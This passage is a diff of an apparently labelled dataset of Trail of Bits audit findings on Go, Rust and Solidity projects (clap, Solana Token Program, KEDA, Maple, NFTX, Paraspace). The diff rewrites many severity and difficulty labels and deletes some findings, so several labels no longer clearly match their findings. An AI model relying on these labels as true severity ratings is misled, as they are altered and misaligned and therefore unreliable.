:= json.NewDecoder(body).Decode(v) if err != nil { panic(BadRequest(\"Failed to parse request body\", \"jsonErr\", err)) } } Figure 3.1: clap/lib/clap/request.go#L31L42 // MustBeAuthenticated returns user ID if request authenticated, // otherwise panics. func (r *Request) MustBeAuthenticated() User { user, err := r.User() if err == nil && user == nil { err = errors.New(\"user is nil\") } else if !user.Valid() { err = errors.New(\"user id is zero\") } if err != nil { panic(Error(\"not authenticated: \" + err.Error())) } return *user } Figure 3.2: clap/lib/clap/request.go#L134L147 defer func() { if e := recover(); e != nil { if err, ok := e.(*RequestError); ok { onError(w, r, err) } else { panic(e) } } }() Figure 3.3: clap/lib/clap/handler.go#L93L101 Recommendations Short term, change the code in gures 3.1, 3.2, and 3.3 so that it adheres to the conventions of handling expected errors in Go. This will simplify the error-handling functionality and the process of reasoning about the code. Reserving panics for unexpected situations or bugs in the code will also help surface incorrect assumptions. Long term, use panics only to handle unexpected errors.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: Low" ] }, { @@ -35,8 +35,8 @@ "body": "The clap HTTP endpoint handler code appears to indicate that the handlers perform manual endpoint authentication. This is because when a handler receives a clap.Request, it calls the MustBeAuthenticated method (gure 4.1). The name of this method could imply that it is called to authenticate the endpoint. However, MustBeAuthenticated returns information on the (already authenticated) user who submitted the request; authentication is actually performed by default by a centralized mechanism before the call to a handler. Thus, the use of this method could cause confusion regarding the timing of authentication. func (h *AlertsHandler) handleGet(r *clap.Request) interface{} { // Parse arguments q := r.URL.Query() var minSeverity uint64 if ms := q.Get(\"minSeverity\"); ms != \"\" { var err error minSeverity, err = strconv.ParseUint(ms, 10, 8) if err != nil || minSeverity > 5 { return clap.BadRequest(\"Invalid minSeverity parameter\") } } if h.MinSeverity > minSeverity { minSeverity = h.MinSeverity } filterEventType := q.Get(\"eventType\") user := r.MustBeAuthenticated() ... } Figure 4.1: clap/apiv1/alerts.go#L363L379 Recommendations Short term, add a ServeAuthenticatedAPI interface method that takes an additional user parameter indicating that the handler is already in the authenticated context. Long term, document the authentication system to make it easier for new team members and auditors to understand and to facilitate their onboarding.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { @@ -55,8 +55,8 @@ "body": "In several parts of the ae code, les are created with overly broad permissions that allow them to be read by anyone in the system. This occurs in the following code paths: ae/tools/copy.go#L50 ae/bqimport/import.go#L291 ae/tools/migrate.go#L127 ae/tools/migrate.go#L223 ae/tools/migrate.go#L197 ae/tools/copy.go#L16 ae/main.go#L319 Recommendations Short term, change the le permissions, limiting them to only those that are necessary. Long term, always consider the principle of least privilege when making decisions about le permissions.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Undetermined" + "Severity: Informational", + "Difficulty: High" ] }, { @@ -65,8 +65,8 @@ "body": "The gosec tool identied many unhandled errors in the ae and clap codebases. Recommendations Short term, run gosec on the ae and clap codebases, and address the unhandled errors. Even if an error is considered unimportant, it should still be handled and discarded, and the decision to discard it should be justied in a code comment. Long term, encourage the team to use gosec, and run it before any major release.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" + "Severity: Informational", + "Difficulty: High" ] }, { @@ -85,7 +85,7 @@ "body": "Every account that the Token Program operates on should be owned by the Token Program, but several instructions lack account ownership checks. The functions lacking checks include process_reallocate , process_withdraw_withheld_tokens_from_mint , and process_withdraw_withheld_tokens_from_accounts . Many of these functions have an implicit check for this condition in that they modify the account data, which is possible only if the account is owned by the Token Program; however, future changes to the associated code could remove this protection. For example, in the process_withdraw_withheld_tokens_from_accounts instruction, neither the mint_account_info nor destination_account_info parameter is checked to ensure the account is owned by the Token Program. While the mint accounts data is mutably borrowed, the account data is never written. As a result, an attacker could pass a forged account in place of the mint account. Conversely, the destination_account_info accounts data is updated by the instruction, so it must be owned by the Token Program. However, if an attacker can nd a way to spoof an account public key that matches the mint property in the destination account, he could bypass the implicit check. Recommendations Short term, as a defense-in-depth measure, add explicit checks of account ownership for all accounts passed to instructions. This will both improve the clarity of the codebase and remove the dependence on implicit checks, which may no longer hold true when updates occur.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Undetermined", "Difficulty: Medium" ] }, @@ -95,7 +95,7 @@ "body": "Running the cargo audit command uncovered the use of one crate with a known vulnerability ( time ). cargo audit Fetching advisory database from `https://github.com/RustSec/advisory-db.git` Loaded 458 security advisories (from /Users/andershelsing/.cargo/advisory-db) Updating crates.io index Scanning Cargo.lock for vulnerabilities (651 crate dependencies) Crate: time Version: 0.1.44 Title: Potential segfault in the time crate Date: 2020-11-18 ID: RUSTSEC-2020-0071 URL: https://rustsec.org/advisories/RUSTSEC-2020-0071 Solution: Upgrade to >=0.2.23 Figure 3.1: The result of running the cargo audit command Recommendations Short term, triage the use of the vulnerability in the time crate and upgrade the crate to a version in which the vulnerability is patched.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Undetermined", "Difficulty: Low" ] }, @@ -105,17 +105,7 @@ "body": "The call to try_from in the init_extension function returns an error if the length of the given extension is larger than u16::Max , which causes the unwrap operation to panic. let length = pod_get_packed_len::(); *length_ref = Length::try_from(length).unwrap(); Figure 4.1: https://github.com/solana-labs/solana-program-library/token/program-2022 /src/extension/mod.rs#L493-L494 Recommendations Short term, add assertions to the program to catch extensions whose sizes are too large, and add relevant code to handle errors that could arise in the try_from function. This will ensure that the Token Program does not panic if any extension grows larger than u16::Max .", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Undetermined" - ] - }, - { - "title": "5. Unescaped components in PostgreSQL connection string ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2023-01-keda-securityreview.pdf", - "body": "The PostgreSQL scaler creates a connection string by formatting the congured host, port, username, database name, SSL mode, and password with fmt.Sprintf : meta.connection = fmt.Sprintf( \"host=%s port=%s user=%s dbname=%s sslmode=%s password=%s\" , host, port, userName, dbName, sslmode, password, ) Figure 5.1: pkg/scalers/postgresql_scaler.go#L127-L135 However, none of the parameters included in the format string are escaped before the call to fmt.Sprintf . According to the PostgreSQL documentation , To write an empty value, or a value containing spaces, surround it with single quotes, for example keyword = 'a value' . Single quotes and backslashes within a value must be escaped with a backslash, i.e., \\' and \\\\ . As KEDA does not perform this escaping, the connection string could fail to parse if any of the conguration parameters (e.g., the password) contains symbols with special meaning in PostgreSQL connection strings. Furthermore, this issue may allow the injection of harmful or unintended parameters into the connection string using spaces and equal signs. Although the latter attack violates assumptions about the applications behavior, it is not a severe issue in KEDAs case because users can already pass full connection strings via the connectionFromEnv conguration parameter. Exploit Scenario A user congures the PostgreSQL scaler with a password containing a space. As the PostgreSQL scaler does not escape the password in the connection string, when the client connection is initialized, the string fails to parse, an error is thrown, and the scaler does not function. Recommendations Short term, escape the user-provided PostgreSQL parameters using the method described in the PostgreSQL documentation . Long term, use the custom Semgrep rule provided in Appendix C to detect future instances of this issue.", - "labels": [ - "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: Low" ] }, @@ -126,7 +116,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Medium" + "Difficulty: Low" ] }, { @@ -145,7 +135,7 @@ "body": "The get_extension_indices function returns either the indices for a given extension type or the rst uninitialized slot. Because a TLV data record can never be deleted, the rst zero-value entry of the slice should indicate that the iteration has reached the end of the used data space. However, if the init parameter is false, the start_index index is advanced by two, and the iteration continues, presumably iterating over empty data until it reaches the end of the TLV data for the account. while start_index < tlv_data.len() { let tlv_indices = get_tlv_indices(start_index); if tlv_data.len() < tlv_indices.value_start { return Err (ProgramError::InvalidAccountData); } ... // got to an empty spot, can init here, or move forward if not initing if extension_type == ExtensionType::Uninitialized { if init { return Ok (tlv_indices); } else { start_index = tlv_indices.length_start; } } ... Figure 7.1: https://github.com/solana-labs/solana-program-library/token/program-2022 /src/extension/mod.rs#L96-L122 Recommendations Short term, modify the associated code so that it terminates the iteration when it reaches uninitialized data, which should indicate the end of the used TLV record data.", "labels": [ "Trail of Bits", - "Severity: Low", + "Severity: Informational", "Difficulty: Low" ] }, @@ -156,7 +146,7 @@ "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Low" ] }, { @@ -165,8 +155,8 @@ "body": "The comments on the MINT_WITH_EXTENSION variable are incorrect. See gure 9.1 for the incorrect comments, highlighted in red, and the corrected comments, highlighted in yellow. const MINT_WITH_EXTENSION: & [ u8 ] = &[ // base mint 1 , 0 , 0 , 0 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , ]; 1 , 1 , 1 , 1 , 1 , 42 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 7 , 1 , 1 , 0 , 0 , 0 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , 2 , // padding 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , 0 , // account type 1 , // extension type <== really account type 3 , 0 , // length <== really extension type 32 , 0 , // data <== really extension length 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , 1 , <== really extension data Figure 9.1: https://github.com/solana-labs/solana-program-library/blob/50abadd819df2 e406567d6eca31c213264c1c7cd/token/program-2022/src/extension/mod.rs#L828 -L841 Recommendations Short term, update the comments to align with the data. This will ensure that developers working on the tests will not be confused by the data structure.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: High" + "Severity: Informational", + "Difficulty: Low" ] }, { @@ -176,7 +166,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: High" + "Difficulty: Low" ] }, { @@ -185,7 +175,7 @@ "body": "For condential transfers, the pending balance is split into lo and hi values: of the total 64 bits representing the value, lo contains the low 16 bits, and hi contains the high 48 bits. Some instructions seem to update only the lo bits. For example, the process_destination_for_transfer function updates only the pending_balance_lo eld of the destination_confidential_transfer_account account. Changing the ct_withdraw_withheld_tokens_from_accounts integration test so that the resulting fee is greater than u16::Max (and updating the test to account for other changes to account balances) breaks the test, which indicates that the pattern of updating only the lo bits is problematic. We found the same pattern in the process_withdraw_withheld_tokens_from_mint function for the destination_confidential_transfer_account account and in the process_withdraw_withheld_tokens_from_accounts function for the destination_confidential_transfer_account account. #[cfg(feature = \"zk-ops\" )] fn process_destination_for_transfer ( destination_token_account_info: & AccountInfo , mint_info: & AccountInfo , destination_encryption_pubkey: & EncryptionPubkey , destination_ciphertext_lo: & EncryptedBalance , destination_ciphertext_hi: & EncryptedBalance , encrypted_fee: Option , ) -> ProgramResult { check_program_account(destination_token_account_info.owner)?; ... // subtract fee from destination pending balance let new_destination_pending_balance = ops::subtract( &destination_confidential_transfer_account.pending_balance_lo, &ciphertext_fee_destination, ) .ok_or(ProgramError::InvalidInstructionData)?; // add encrypted fee to current withheld fee let new_withheld_amount = ops::add( &destination_confidential_transfer_account.withheld_amount, &ciphertext_fee_withheld_authority, ) .ok_or(ProgramError::InvalidInstructionData)?; destination_confidential_transfer_account.pending_balance_lo = new_destination_pending_balance; destination_confidential_transfer_account.withheld_amount = new_withheld_amount; ... Figure 11.1: https://github.com/solana-labs/solana-program-library/token/program-2022 /src/extension/confidential_transfer/processor.rs#L761-L777 Recommendations Short term, investigate the security implications of operating only on the lo bits in operations and determine whether this pattern should be changed.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Undetermined", "Difficulty: High" ] }, @@ -196,7 +186,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Medium" + "Difficulty: Low" ] }, { @@ -216,7 +206,7 @@ "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: High" + "Difficulty: Low" ] }, { @@ -236,7 +226,7 @@ "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Medium" + "Difficulty: Low" ] }, { @@ -245,7 +235,7 @@ "body": "The getLatestPrice function retrieves a specic asset price from Chainlink. However, the price (a signed integer) is rst checked that it is non-zero and then is cast to an unsigned integer with a potentially negative value. An incorrect price would temporarily aect the expected amount of fund assets during liquidation. function getLatestPrice(address asset_) external override view returns (uint256 latestPrice_) { // If governor has overridden price because of oracle outage, return overridden price. if (manualOverridePrice[asset_] != 0) return manualOverridePrice[asset_]; ( uint80 roundId_, int256 price_, , uint256 updatedAt_, uint80 answeredInRound_ ) = IChainlinkAggregatorV3Like(oracleFor[asset_]).latestRoundData(); require(updatedAt_ != 0, \"MG:GLP:ROUND_NOT_COMPLETE\"); require(answeredInRound_ >= roundId_, \"MG:GLP:STALE_DATA\"); require(price_ != int256(0), \"MG:GLP:ZERO_PRICE\"); latestPrice_ = uint256(price_); } Figure 5.1: getLatestPrice function (globals-v2/contracts/MapleGlobals.sol#297-308) Exploit Scenario Chainlinks oracle returns a negative value for an in-process liquidation. This value is then unsafely cast to an uint256. The expected amount of fund assets from the protocol is incorrect, which prevents liquidation. Recommendations Short term, check that the price is greater than 0. Long term, add tests for the Chainlink price feed with various edge cases. Additionally, set up a monitoring system in the event of unexpected market failures. A Chainlink oracle can have a minimum and maximum value, and if the real price is outside of that range, it will not be possible to update the oracle; as a result, it will report an incorrect price, and it will be impossible to know this on-chain.", "labels": [ "Trail of Bits", - "Severity: Undetermined", + "Severity: Low", "Difficulty: High" ] }, @@ -255,8 +245,8 @@ "body": "The Pool implementation of EIP-4626 is incorrect for maxDeposit and maxMint because these functions do not consider all possible cases in which deposit or mint are disabled. EIP-4626 is a standard for implementing tokenized vaults. In particular, it species the following: maxDeposit: MUST factor in both global and user-specic limits. For example, if deposits are entirely disabled (even temporarily), it MUST return 0. maxMint: MUST factor in both global and user-specic limits. For example, if mints are entirely disabled (even temporarily), it MUST return 0. The current implementation of maxDeposit and maxMint in the Pool contract directly call and return the result of the same functions in PoolManager (gure 6.1). As shown in gure 6.1, both functions rely on _getMaxAssets, which correctly checks that the liquidity cap has not been reached and that deposits are allowed and otherwise returns 0. However, these checks are insucient. function maxDeposit(address receiver_) external view virtual override returns (uint256 maxAssets_) { maxAssets_ = _getMaxAssets(receiver_, totalAssets()); } function maxMint(address receiver_) external view virtual override returns (uint256 maxShares_) { uint256 totalAssets_ = totalAssets(); uint256 totalSupply_ = IPoolLike(pool).totalSupply(); uint256 maxAssets_ = _getMaxAssets(receiver_, totalAssets_); maxShares_ = totalSupply_ == 0 ? maxAssets_ : maxAssets_ * totalSupply_ / totalAssets_; } [...] function _getMaxAssets(address receiver_, uint256 totalAssets_) internal view returns (uint256 maxAssets_) { bool depositAllowed_ = openToPublic || isValidLender[receiver_]; uint256 liquidityCap_ = liquidityCap; maxAssets_ = liquidityCap_ > totalAssets_ && depositAllowed_ ? liquidityCap_ - totalAssets_ : 0; } Figure 6.1: The maxDeposit and maxMint functions (pool-v2/contracts/PoolManager.sol#L451-L461) and the _getMaxAssets function (pool-v2/contracts/PoolManager.sol#L516-L520) The deposit and mint functions have a checkCall modier that will call the canCall function in the PoolManager to allow or disallow the action. This modier rst checks if the global protocol pause is active; if it is not, it will perform additional checks in _canDeposit. For this issue, it will be impossible to deposit or mint if the Pool is not active. function canCall(bytes32 functionId_, address caller_, bytes memory data_) external view override returns (bool canCall_, string memory errorMessage_) { if (IMapleGlobalsLike(globals()).protocolPaused()) { return (false, \"PM:CC:PROTOCOL_PAUSED\"); } if (functionId_ == \"P:deposit\") { ( uint256 assets_, address receiver_ ) = abi.decode(data_, (uint256, address)); } return _canDeposit(assets_, receiver_, \"P:D:\"); if (functionId_ == \"P:depositWithPermit\") { ( uint256 assets_, address receiver_, , , , ) = abi.decode(data_, (uint256, address, uint256, uint8, bytes32, bytes32)); return _canDeposit(assets_, receiver_, \"P:DWP:\"); } if (functionId_ == \"P:mint\") { ( uint256 shares_, address receiver_ ) = abi.decode(data_, (uint256, address)); \"P:M:\"); } return _canDeposit(IPoolLike(pool).previewMint(shares_), receiver_, if (functionId_ == \"P:mintWithPermit\") { ( uint256 shares_, address receiver_, , , , , ) = abi.decode(data_, (uint256, address, uint256, uint256, uint8, bytes32, bytes32)); return _canDeposit(IPoolLike(pool).previewMint(shares_), receiver_, \"P:MWP:\"); } [...] function _canDeposit(uint256 assets_, address receiver_, string memory errorPrefix_) internal view returns (bool canDeposit_, string memory errorMessage_) { if (!active) return (false, _formatErrorMessage(errorPrefix_, \"NOT_ACTIVE\")); if (!openToPublic && !isValidLender[receiver_]) return (false, _formatErrorMessage(errorPrefix_, \"LENDER_NOT_ALLOWED\")); if (assets_ + totalAssets() > liquidityCap) return (false, _formatErrorMessage(errorPrefix_, \"DEPOSIT_GT_LIQ_CAP\")); return (true, \"\"); } Figure 6.2: The canCall function (pool-v2/contracts/PoolManager.sol#L370-L393), and the _canDeposit function (pool-v2/contracts/PoolManager.sol#L498-L504) The maxDeposit and maxMint functions should return 0 if the global protocol pause is active or if the Pool is not active; however, these cases are not considered. Exploit Scenario A third-party protocol wants to deposit into Maples pool. It rst calls maxDeposit to obtain the maximum amount of asserts it can deposit and then calls deposit. However, the latter function call will revert because the protocol is paused. Recommendations Short term, return 0 in maxDeposit and maxMint if the protocol is paused or if the pool is not active. Long term, maintain compliance with the EIP specication being implemented (in this case, EIP-4626).", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" + "Severity: Low", + "Difficulty: High" ] }, { @@ -265,7 +255,7 @@ "body": "The administrative functions setAllowedSlippage and setMinRatio have a requirement that they can be called only by the poolManager. However, they are not called by any reachable function in the PoolManager contract. function setAllowedSlippage(address collateralAsset_, uint256 allowedSlippage_) external override { require(msg.sender == poolManager, \"LM:SAS:NOT_POOL_MANAGER\"); require(allowedSlippage_ <= HUNDRED_PERCENT, \"LM:SAS:INVALID_SLIPPAGE\"); emit AllowedSlippageSet(collateralAsset_, allowedSlippageFor[collateralAsset_] = allowedSlippage_); } function setMinRatio(address collateralAsset_, uint256 minRatio_) external override { require(msg.sender == poolManager, \"LM:SMR:NOT_POOL_MANAGER\"); emit MinRatioSet(collateralAsset_, minRatioFor[collateralAsset_] = minRatio_); } Figure 7.1: setAllowedSlippage and setMinRatio function (pool-v2/contracts/LoanManager.sol#L75-L85) Exploit Scenario Alice, a pool administrator, needs to adjust the slippage parameter of a particular collateral token. Alices transaction reverts since she is not the poolManager contract address. Alice checks the PoolManager contract for a method through which she can set the slippage parameter, but none exists. Recommendations Short term, add functions in the PoolManager contract that can reach setAllowedSlippage and setMinRatio on the LoanManager contract. Long term, add unit tests that validate all system parameters can be updated successfully.", "labels": [ "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: Low" ] }, @@ -296,7 +286,7 @@ "labels": [ "Trail of Bits", "Severity: Low", - "Difficulty: Medium" + "Difficulty: High" ] }, { @@ -306,7 +296,7 @@ "labels": [ "Trail of Bits", "Severity: Undetermined", - "Difficulty: Low" + "Difficulty: High" ] }, { @@ -315,17 +305,7 @@ "body": "The _disburseLiquidationFunds and _distributeClaimedFunds functions, which send the fees to the various actors, do not check that the mapleTreasury address was set. Althoughthe mapleTreasury address is supposedly set immediately after the creation of the MapleGlobals contract, no checks prevent sending the fees to the zero address, leading to a loss for Maple. function _disburseLiquidationFunds(address loan_, uint256 recoveredFunds_, uint256 platformFees_, uint256 remainingLosses_) internal returns (uint256 updatedRemainingLosses_, uint256 updatedPlatformFees_) { [...] require(toTreasury_ == 0 || ERC20Helper.transfer(fundsAsset_, mapleTreasury(), toTreasury_), \"LM:DLF:TRANSFER_MT_FAILED\"); Figure 12.1: The _disburseLiquidationFunds function (pool-v2/contracts/LoanManager.sol#L566-L584) Exploit Scenario Bob, a Maple admin, sets up the protocol but forgets to set the mapleTreasury address. Since there are no warnings, the expected claim or liquidation fees are sent to the zero address until the Maple team notices the issue. Recommendations Short term, add a check that the mapleTreasury is not set to address zero in _disburseLiquidationFunds and _distributeClaimedFunds. Long term, improve the unit and integration tests to check that the system behaves correctly both for the happy case and the non-happy case.", "labels": [ "Trail of Bits", - "Severity: Informational", - "Difficulty: N/A" - ] - }, - { - "title": "1. Reliance on third-party library for deployment ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "Due to the use of the delegatecall proxy pattern, some NFTX contracts cannot be initialized with their own constructors; instead, they have initializer functions. These functions can be front-run, allowing an attacker to initialize contracts incorrectly. function __NFTXInventoryStaking_init(address _nftxVaultFactory) external virtual override initializer { __Ownable_init(); nftxVaultFactory = INFTXVaultFactory(_nftxVaultFactory); address xTokenImpl = address(new XTokenUpgradeable()); __UpgradeableBeacon__init(xTokenImpl); } Figure 1.1: The initializer function in NFTXInventoryStaking.sol:37-42 The following contracts have initializer functions that can be front-run: NFTXInventoryStaking NFTXVaultFactoryUpgradeable NFTXEligibilityManager NFTXLPStaking NFTXSimpleFeeDistributor The NFTX team relies on hardhat-upgrades, a library that oers a series of safety checks for use with certain OpenZeppelin proxy reference implementations to aid in the proxy deployment process. It is important that the NFTX team become familiar with how the hardhat-upgrades library works internally and with the caveats it might have. For example, some proxy patterns like the beacon pattern are not yet supported by the library. Exploit Scenario Bob uses the library incorrectly when deploying a new contract: he calls upgradeTo() and then uses the fallback function to initialize the contract. Eve front-runs the call to the initialization function and initializes the contract with her own address, which results in an incorrect initialization and Eves control over the contract. Recommendations Short term, document the protocols use of the library and the proxy types it supports. Long term, use a factory pattern instead of the initializer functions to prevent front-running of the initializer functions.", - "labels": [ - "Trail of Bits", - "Severity: Informational", + "Severity: Low", "Difficulty: High" ] }, @@ -345,7 +325,7 @@ "body": "According to EIP-165, a contracts implementation of the supportsInterface function should return true for the interfaces that the contract supports. Outside of the dependencies and mocks directories, only one Paraspace contract has a supportsInterface function. For example, each of the following contracts includes an onERC721Received function; therefore, they should have a supportsInterface function that returns true for the ERC721TokenReceiver interface ( PoolCores onERC721Received implementation appears in gure 3.1): contracts/ui/MoonBirdsGateway.sol contracts/ui/UniswapV3Gateway.sol contracts/ui/WPunkGateway.sol contracts/protocol/tokenization/NToken.sol contracts/protocol/tokenization/NTokenUniswapV3.sol contracts/protocol/tokenization/NTokenMoonBirds.sol contracts/protocol/pool/PoolCore.sol // This function is necessary when receive erc721 from looksrare function onERC721Received( address, address, uint256, bytes memory ) external virtual returns (bytes4) { return this.onERC721Received.selector; } Figure 3.1: contracts/protocol/pool/PoolCore.sol#L773L781 Exploit Scenario Alices contract tries to send an ERC721 token to a PoolCore contract. Alices contract rst tries to determine whether the PoolCore contract supports the ERC721TokenReceiver interface by calling supportsInterface. When the call reverts, Alices contract aborts the transfer. Recommendations Short term, add supportsInterface functions to all contracts that implement a well-known interface. Doing so will help to ensure that Paraspace contracts can interact with external contracts. Long term, add tests to ensure that each contracts supportsInterface function returns true for the interfaces that the contract supports and false for some subset of the interfaces that the contract does not support. Doing so will help to ensure that the supportsInterface functions work correctly. References EIP-165: Standard Interface Detection EIP-721: Non-Fungible Token Standard", "labels": [ "Trail of Bits", - "Severity: Medium", + "Severity: Low", "Difficulty: High" ] }, @@ -356,7 +336,7 @@ "labels": [ "Trail of Bits", "Severity: Informational", - "Difficulty: Low" + "Difficulty: High" ] }, { @@ -365,17 +345,7 @@ "body": "The executeMintToTreasury function silently ignores non-ERC20 assets passed to it. Such behavior could allow erroneous calls to executeMintToTreasury to go unnoticed. The code for executeMintToTreasury appears in gure 5.1. It is called from the mintToTreasury function in PoolParameters.sol (gure 5.2). As shown in gure 5.1, non-ERC20 assets are silently skipped. function executeMintToTreasury( mapping(address => DataTypes.ReserveData) storage reservesData, address[] calldata assets ) external { for (uint256 i = 0; i < assets.length; i++) { address assetAddress = assets[i]; DataTypes.ReserveData storage reserve = reservesData[assetAddress]; DataTypes.ReserveConfigurationMap memory reserveConfiguration = reserve.configuration; // this cover both inactive reserves and invalid reserves since the flag will be 0 for both !reserveConfiguration.getActive() || reserveConfiguration.getAssetType() != DataTypes.AssetType.ERC20 continue; if ( ) { } ... } } Figure 5.1: contracts/protocol/libraries/logic/PoolLogic.sol#L98L134 function mintToTreasury(address[] calldata assets) external virtual override nonReentrant { } PoolLogic.executeMintToTreasury(_reserves, assets); Figure 5.2: contracts/protocol/pool/PoolParameters.sol#L97L104 Note that because this is a minting operation, it likely meant to be called by an administrator. However, an administrator could pass a non-ERC20 asset in error. Because the function silently skips such assets, the error could go unnoticed. Exploit Scenario Alice, a Paraspace administrator, calls mintToTreasury with an array of assets. Alice accidentally sets one array element to an ERC721 asset. Alices mistake is silently ignored by the on-chain code, and no error is reported. Recommendations Short term, have executeMintToTreasury revert when a non-ERC20 asset is passed to it. Doing so will ensure that callers are alerted to such errors. Long term, regularly review all conditionals involving asset types to verify that they handle all applicable asset types correctly. Doing so will help to identify problems involving the handling of dierent asset types.", "labels": [ "Trail of Bits", - "Severity: Medium", - "Difficulty: Low" - ] - }, - { - "title": "7. Risk of denial of service due to unbounded loop ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/NFTX.pdf", - "body": "When protocol fees are distributed, the system loops through the list of beneciaries (known internally as receivers) to send them the protocol fees they are entitled to. function distribute(uint256 vaultId) external override virtual nonReentrant { require(nftxVaultFactory != address(0)); address _vault = INFTXVaultFactory(nftxVaultFactory).vault(vaultId); uint256 tokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); if (distributionPaused || allocTotal == 0) { IERC20Upgradeable(_vault).safeTransfer(treasury, tokenBalance); return; } uint256 length = feeReceivers.length; uint256 leftover; for (uint256 i; i < length; ++i) { FeeReceiver memory _feeReceiver = feeReceivers[i]; uint256 amountToSend = leftover + ((tokenBalance * _feeReceiver.allocPoint) / allocTotal); uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); amountToSend = amountToSend > currentTokenBalance ? currentTokenBalance : amountToSend; bool complete = _sendForReceiver(_feeReceiver, vaultId, _vault, amountToSend); if (!complete) { uint256 remaining = IERC20Upgradeable(_vault).allowance(address(this), _feeReceiver.receiver); IERC20Upgradeable(_vault).safeApprove(_feeReceiver.receiver, 0); leftover = remaining; } else { leftover = 0; } } if (leftover != 0) { uint256 currentTokenBalance = IERC20Upgradeable(_vault).balanceOf(address(this)); IERC20Upgradeable(_vault).safeTransfer(treasury, currentTokenBalance); } } Figure 7.1: The distribute() function in NFTXSimpleFeeDistributor.sol Because this loop is unbounded and the number of receivers can grow, the amount of gas consumed is also unbounded. function _sendForReceiver(FeeReceiver memory _receiver, uint256 _vaultId, address _vault, uint256 amountToSend) internal virtual returns (bool) { if (_receiver.isContract) { IERC20Upgradeable(_vault).safeIncreaseAllowance(_receiver.receiver, amountToSend); bytes memory payload = abi.encodeWithSelector(INFTXLPStaking.receiveRewards.selector, _vaultId, amountToSend); (bool success, ) = address(_receiver.receiver).call(payload); // If the allowance has not been spent, it means we can pass it forward to next. return success && IERC20Upgradeable(_vault).allowance(address(this), _receiver.receiver) == 0; } else { IERC20Upgradeable(_vault).safeTransfer(_receiver.receiver, amountToSend); return true; } } Figure 7.2: The _sendForReceiver() function in NFTXSimpleFeeDistributor.sol Additionally, if one of the receivers is a contract, code that signicantly increases the gas cost of the fee distribution will execute (gure 7.2). It is important to note that fees are usually distributed within the context of user transactions (redeeming, minting, etc.), so the total cost of the distribution operation depends on the logic outside of the distribute() function. Exploit Scenario The NFTX team adds a new feature that allows NFTX token holders who stake their tokens to register as receivers and gain a portion of protocol fees; because of that, the number of receivers grows dramatically. Due to the large number of receivers, the distribute() function cannot execute because the cost of executing it has reached the block gas limit. As a result, users are unable to mint, redeem, or swap tokens. Recommendations Short term, examine the execution cost of the function to determine the safe bounds of the loop and, if possible, consider splitting the distribution operation into multiple calls. Long term, consider redesigning the fee distribution mechanism to avoid unbounded loops and prevent denials of service. See appendix D for guidance on redesigning this mechanism.", - "labels": [ - "Trail of Bits", - "Severity: Medium", + "Severity: Low", "Difficulty: High" ] }, @@ -385,7 +355,7 @@ "body": "The getReservesData function lls in an AggregatedReserveData structure for the reserve handled by an IPoolAddressesProvider. However, the function does not set the structures name and assetType elds. Therefore, o-chain code relying on this function will see uninitialized data. Part of the AggregatedReserveData structure appears in gure 6.1. The complete structure consists of 53 elds. Each iteration of the loop in getReservesData (gure 6.2) lls in the elds of one AggregatedReserveData structure. However, the loop does not set the structures name elds. And although reserve assetTypes are computed, they are never stored in the structure. struct AggregatedReserveData { address underlyingAsset; string name; string symbol; ... //AssetType DataTypes.AssetType assetType; } Figure 6.1: contracts/ui/interfaces/IUiPoolDataProvider.sol#L18L78 function getReservesData(IPoolAddressesProvider provider) public view override returns (AggregatedReserveData[] memory, BaseCurrencyInfo memory) { IParaSpaceOracle oracle = IParaSpaceOracle(provider.getPriceOracle()); IPool pool = IPool(provider.getPool()); address[] memory reserves = pool.getReservesList(); AggregatedReserveData[] memory reservesData = new AggregatedReserveData[](reserves.length); for (uint256 i = 0; i < 